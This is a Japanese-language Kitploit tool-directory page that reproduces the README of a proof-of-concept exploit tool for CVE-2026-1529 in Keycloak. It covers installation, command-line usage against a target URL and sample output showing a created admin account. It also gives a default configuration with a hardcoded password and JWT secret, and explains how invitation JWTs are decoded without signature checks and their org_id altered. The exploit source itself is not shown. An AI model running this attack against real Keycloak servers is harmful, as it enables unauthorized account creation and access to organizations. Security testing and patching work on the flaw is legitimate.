Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — CVE-2026-1529(PoC)はKeycloakにおける重大な脆弱性であり、不適切な招待トークン検証により、未承認の組織登録を可能にします。このエクスプロイトツールは、JWTトークンを操作して未承認の組織にユーザーを登録することで、この脆弱性を実証します。 | Kitploit
ツール/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529(PoC)はKeycloakにおける重大な脆弱性であり、不適切な招待トークン検証により、未承認の組織登録を可能にします。このエクスプロイトツールは、JWTトークンを操作して未承認の組織にユーザーを登録することで、この脆弱性を実証します。

リポジトリを見る
6ヶ月前未レビュー

CVE-2026-1529 Keycloak Exploit Tool

Keycloak: 不適切な招待トークン検証による未承認の組織登録


免責事項

このツールは教育およびセキュリティテスト目的のみで使用してください。 明示的なテスト許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。本ツールの作成者は、本ソフトウェアの誤用や損害について一切の責任を負いません。

作成者: f3ds cr3w est, 2002


概要

CVE-2026-1529 は Keycloak における重大な脆弱性であり、不適切な招待トークン検証を通じて未承認の組織登録を可能にします。このエクスプロイトツールは、JWT トークンを操作して未承認の組織にユーザーを登録することで、この脆弱性を実証します。

技術詳細

  • CVE ID: CVE-2026-1529
  • 影響を受けるソフトウェア: Keycloak (org.keycloak.services.resources.organizations)
  • CVSS スコア: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • 攻撃ベクトル: ネットワーク
  • 攻撃の複雑さ: 低
  • 影響: 組織リソースへの未承認アクセス

脆弱性の説明

この脆弱性は、組織招待における JWT トークン検証プロセスに存在します。攻撃者は JWT ペイロード内の org_id フィールドと email フィールドを操作でき、適切な認可なしに任意の組織へユーザーを登録できます。


インストール

前提条件

  • Python 3.7 以降
  • pip パッケージマネージャー

セットアップ

  1. エクスプロイトツールをクローンまたはダウンロードします:
root@kitploit:~
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. 必要な依存関係をインストールします:
root@kitploit:~
pip install -r requirements.txt
  1. エクスプロイトスクリプトを実行可能にします:
root@kitploit:~
chmod +x keycloak-exploit.py

使用方法

基本的な使用方法

root@kitploit:~
# ターゲット URL を使用した標準的な使用法
python keycloak-exploit.py https://target-keycloak.com

# ヘルプを表示
python keycloak-exploit.py -h

# バージョンを表示
python keycloak-exploit.py -v

高度な使用方法

root@kitploit:~
# カスタム招待トークンを使用
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# カスタム組織 ID を使用
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# カスタム設定ファイルを使用
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# デバッグログを有効化
python keycloak-exploit.py -d https://target-keycloak.com

コマンドラインオプション


出力

エクスプロイト成功時

エクスプロイトが成功すると、次のような出力が表示されます:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

エクスプロイト失敗時

エクスプロイトが失敗すると、次のように表示されます:

root@kitploit:~
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

プロジェクト構造

root@kitploit:~
CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

設定

デフォルト設定

このツールは、次の設定を含むデフォルト設定ファイル(config/default_config.json)を使用します:

root@kitploit:~
{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

カスタム設定

カスタム設定ファイルを作成し、-c オプションで使用できます:

root@kitploit:~
{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

技術詳細

エクスプロイトプロセス

  1. ターゲット分析: ターゲットが脆弱な Keycloak インスタンスかどうかを確認
  2. トークン生成: カスタム招待トークンを生成または使用
  3. トークン操作: JWT ペイロードを操作して組織 ID を変更
  4. ユーザー登録: 操作したトークンを使用してユーザーを登録
  5. ログインテスト: 作成したユーザーがログインできることを確認
  6. レポート生成: 詳細なエクスプロイトレポートを作成

JWT 操作

このツールは、次の方法で不適切な JWT 検証を悪用します:

  1. 署名検証なしで JWT トークンをデコード
  2. org_id フィールドを変更して別の組織をターゲットにする
  3. 必要に応じて email フィールドを変更
  4. 操作されたペイロードでトークンを再エンコード

セキュリティに関する考慮事項

  • このツールは適切なエラーハンドリングとロギングを使用します
  • すべてのネットワークリクエストには適切なヘッダーが含まれます
  • すべてのユーザー入力に対して入力検証が実行されます
  • このツールはターゲットのサーバーレスポンスコードを尊重します

トラブルシューティング

一般的な問題

  1. 接続エラー

    • ターゲット URL にアクセスできるか確認
    • ターゲットが Keycloak インスタンスであることを確認
    • ネットワーク接続とファイアウォール設定を確認
  2. トークン検証エラー

    • トークン形式が正しいことを確認
    • トークンに必要なフィールド(org_id、email、invitation_type)が含まれているか確認
    • トークンが期限切れでないことを確認
  3. 登録失敗

    • 登録エンドポイントにアクセスできるか確認
    • 操作されたトークン形式を確認
    • ターゲットで組織登録が有効になっているか確認

デバッグモード

詳細なトラブルシューティングのためにデバッグログを有効にします:

root@kitploit:~
python keycloak-exploit.py -d https://target-keycloak.com

ログファイル

  • メインログ: logs/exploit.log
  • レポート: output/reports/exploit_report_YYYYMMDD_HHMMSS.txt

テスト方法

脆弱性評価

このツールは次のチェックを実行します:

  1. ヘルスチェック: ターゲットが Keycloak インスタンスであることを確認
  2. バージョン検出: Keycloak のバージョン検出を試みる
  3. エンドポイントテスト: 組織関連のエンドポイントをテスト
  4. トークン検証: JWT トークン構造を検証

エクスプロイト検証

次の条件を満たす場合、エクスプロイトは成功と見なされます:

  1. ターゲットが脆弱である
  2. 操作されたトークンを使用してユーザーを登録できる
  3. 登録されたユーザーが正常にログインできる
  4. 有効なログインリンクが生成される

セキュリティのベストプラクティス

組織向け

  1. パッチの適用: 最新の Keycloak バージョンに更新
  2. トークン検証: 適切な JWT 署名検証を実装
  3. アクセス制御: 組織登録を承認済みユーザーに制限
  4. モニタリング: 不審な登録アクティビティを監視
  5. ネットワークセキュリティ: 適切なファイアウォールルールを実装

セキュリティ研究者向け

  1. 認可: テスト許可を得たシステムのみをテスト
  2. 責任ある開示: 脆弱性をベンダーに報告
  3. 文書化: テストの詳細な記録を保持
  4. 倫理的テスト: 責任ある開示の慣行に従う

ライセンス

このツールは教育およびセキュリティテスト目的のみで提供されます。自己責任で使用してください。

作成者: f3ds cr3w est, 2002

連絡先: 質問やフィードバックについては、プロジェクトリポジトリを参照してください。


変更履歴

バージョン 1.0

  • 初回リリース
  • 基本的なエクスプロイト機能
  • JWT 操作機能
  • レポート生成
  • コマンドラインインターフェース

🙏 謝辞

  • Keycloak 開発チーム
  • CVE-2026-1529 を発見したセキュリティ研究者
  • オープンソースセキュリティコミュニティ

覚えておいてください: 大きな力には大きな責任が伴います。このツールを賢明かつ倫理的に使用してください。

by f3ds cr3w est, 2002

ツールをダウンロード
オプション説明必須
targetターゲットの Keycloak URL(IP またはドメイン)はい
-t, --token使用するカスタム招待トークンいいえ
-o, --org-idカスタム組織 IDいいえ
-c, --config設定ファイルへのパスいいえ
-d, --debugデバッグログを有効化いいえ
-v, --versionバージョン情報を表示いいえ
-h, --helpヘルプメッセージを表示いいえ